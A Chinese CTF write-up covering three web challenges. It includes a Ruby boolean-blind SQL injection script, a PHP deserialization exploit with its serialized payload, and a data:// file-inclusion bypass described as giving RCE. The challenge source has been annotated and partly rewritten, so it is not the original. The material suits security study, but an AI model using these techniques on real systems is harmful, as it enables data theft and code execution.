Author:颖奇L’Amore

Blog:www.gem-love.com


easiestSQLi

布尔盲注 + 二分法逐字符注入

#!/usr/bin/ruby -w
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore

require "open-uri"
result = ''
# Extracts one character of the target string per outer iteration: the inner
# loop is a binary search over ASCII codes 32..127, sending one HTTP request
# per probe (up to ~7 per character). A full run is therefore hundreds to a
# few thousand near-identical requests to the same endpoint, which is the
# server-side signal for this kind of boolean-based blind injection.
1000.times do |i|
  low = 32
  high = 128
  mid = ( low + high ) / 2
  while low < high
    # Boolean probe: the injected comparison is "character > mid", and the
    # presence of the 'AGAIN' marker in the response is used as the oracle.
    url = "http://[your_docker_container].cloudeci1.ichunqiu.com/?id=1=((ascii(substr((select(flag)from(flag)),#{i+1},1)))>#{mid})"
    res = nil
    open(url) do |http|   # open-uri's Kernel#open override; Ruby 3.0+ needs URI.open
      res = http.read
    end
    # String#[] returns nil when the marker is absent; the script treats that
    # as "condition true" and moves the lower bound up.
    if res['AGAIN'] === nil
      low = mid + 1
    else
      high = mid
    end
    mid = ( low + high ) / 2
    # A result at either edge of the search range is taken as end of data,
    # but this only leaves the inner loop; the outer loop still runs 1000x.
    if mid == 32 or mid == 127
      break
    end
  end
  result += mid.chr
  puts result
end

Inclusion

阅读源码,找到可利用的类和反序列化入口

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    // Runs when the object is destroyed or the script ends. Objects produced
    // by unserialize() are destructed too, so this method is reachable from
    // attacker-supplied serialized data and calls getFlag() on whatever
    // $alize holds (a Flag instance in the intended chain).
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;    // path handed to highlight_file()
    public $t1;   // token set once in the constructor
    public $t2;   // token re-rolled on every getFlag() call

    // Note: unserialize() does not call __construct, so t1/t2 of a
    // deserialized Flag are whatever the serialized payload carries.
    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        // Re-randomising t2 is meant to make t1 === t2 hold only with
        // probability ~1/10000 per call. A payload in which t1 is a PHP
        // reference to t2 defeats this: both then read the same storage
        // slot, so the comparison is always true.
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);   // discloses any readable file named in $f
            }
        } else {
            echo "no";
        }
    }
}
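// Insecure deserialization sink: the p query parameter goes to unserialize()
// unchanged, so any class defined above (Seri -> __destruct -> Flag::getFlag)
// can be instantiated with attacker-chosen property values. Testing the
// superglobal with isset() before reading it avoids the undefined-index
// notice the original raised on requests without ?p=.
if (isset($_GET['p'])) {
    // FIXME: unserialize() on user input; pass ['allowed_classes' => false]
    // (PHP 7+) or move to json_decode() to remove the gadget chain.
    $p = unserialize($_GET['p']);
} else {
    echo "NONONO";
}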
?>

每次请求的成功率约为 1/10000,发送约 10000 个请求进行爆破,有很大概率能够得到 flag

利用 PHP 引用(&)让 t1 与 t2 共享同一个值即可,exp:

<?php
class Seri{
    public $alize;
    // Mirrors the server-side class layout so serialize() emits the property
    // names the target's unserialize() expects; $alize is filled with a Flag
    // so the remote __destruct reaches getFlag().
    function __construct()
    {
        $this->alize = new Flag;
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;
    function __construct(){
        $this->t2 = md5(rand(1,10000));
        // t1 is a PHP reference to t2: serialize() writes the value once and
        // encodes the other property as a back-reference (the "R:4;" in the
        // output below). After unserialize() both properties share one slot,
        // so the server's reassignment of t2 is observed through t1 as well.
        $this->t1 = &$this->t2;
        $this->f = 'flag.php';
    }
}
$seri = new Seri();
// Emits the serialized payload the challenge reads from $_GET['p'];
// the sample below is one run's output (the t1 hash varies per run).
echo serialize($seri); 
//O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"1a336426e09602a4f0118326dd6c72ac";s:2:"t2";R:4;}}

Soitgoes

可以用 php wrapper,但过滤了 base、rot、string 等关键字;改用平时不常见的过滤器读取 flag.php 源码即可


文件包含绕过

从 vim 临时文件中得到源码

<?php
    header("Content-type: text/html; charset=utf-8");
    echo "该死,我的电脑总断电,还好编辑器能帮我恢复,吓死惹";
    // Unregistering the php:// wrapper removes php://filter and friends, but
    // other built-in wrappers (the note below mentions data://) stay usable.
    stream_wrapper_unregister('php');

    // Per-request scratch directory name. rand() is not a CSPRNG, but the
    // value only namespaces a temporary directory here.
    $seperate = bin2hex(rand(1,1000000));


    // Shells out to mkdir; the argument is wrapped by escapeshellarg(), so
    // the directory name cannot inject additional shell words.
    $mkdir = function($dir) {
        system('mkdir -p '.escapeshellarg($dir));
    };

    $mkdir('users/'.$seperate);
    chdir('users/'.$seperate);

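    /**
     * Returns the client IP used as a per-client directory name.
     *
     * X-Forwarded-For and Client-IP are request headers and therefore fully
     * client-controlled; the original returned them verbatim. Each candidate
     * is now checked with FILTER_VALIDATE_IP, in the same priority order as
     * before (X-Forwarded-For, Client-IP, REMOTE_ADDR), and the first valid
     * one wins. Only the first comma-separated entry of a header is used.
     *
     * @return string a validated IP address, or '' when none is available
     */
    function getIp(){
        $candidates = array();
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $candidates[] = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        if(isset($_SERVER['HTTP_CLIENT_IP'])){
            $candidates[] = $_SERVER['HTTP_CLIENT_IP'];
        }
        if(isset($_SERVER['REMOTE_ADDR'])){
            $candidates[] = $_SERVER['REMOTE_ADDR'];
        }
        foreach ($candidates as $raw) {
            // Proxy chains append addresses; keep the "first entry" choice of
            // the original, trimming the whitespace that follows the comma.
            $ip_arr = explode(',', $raw);
            $ip = trim($ip_arr[0]);
            if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
                return $ip;
            }
        }
        return '';
    }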

    $curf = getIp();
    // Dots and dashes are stripped and basename() applied, so the
    // client-derived name cannot carry path separators or '..' before it is
    // used as a directory under the per-request scratch dir.
    $curf = basename(str_replace('.','',$curf));
    $curf = basename(str_replace('-','',$curf));


    $mkdir($curf);
    chdir($curf);
    // Dumps the whole $_SERVER array (every request header) into a file
    // inside the scratch directory.
    file_put_contents('res',print_r($_SERVER,true));
    chdir('..');
    // Removing '.' from page is aimed at traversal/extension tricks; it does
    // not restrict stream wrappers. The target is read twice with
    // file_get_contents() for the content checks and then include()d a third
    // time; the note below states the two functions handle the data://
    // wrapper differently, so content that passes the read-side checks can
    // still be executed. Also, stripos() returns 0 for a match at offset 0,
    // and !stripos() treats that as "not found".
    $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

    chdir(__DIR__);
    // Scratch-directory cleanup through the shell; $seperate comes from
    // bin2hex(), so it contains only hex characters.
    system('rm -rf users/'.$seperate);

?>

利用 file_get_contents() 与 include() 对 data 协议处理上的差异,即可绕过 waf、完成包含并 RCE

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/ctf/2549.html
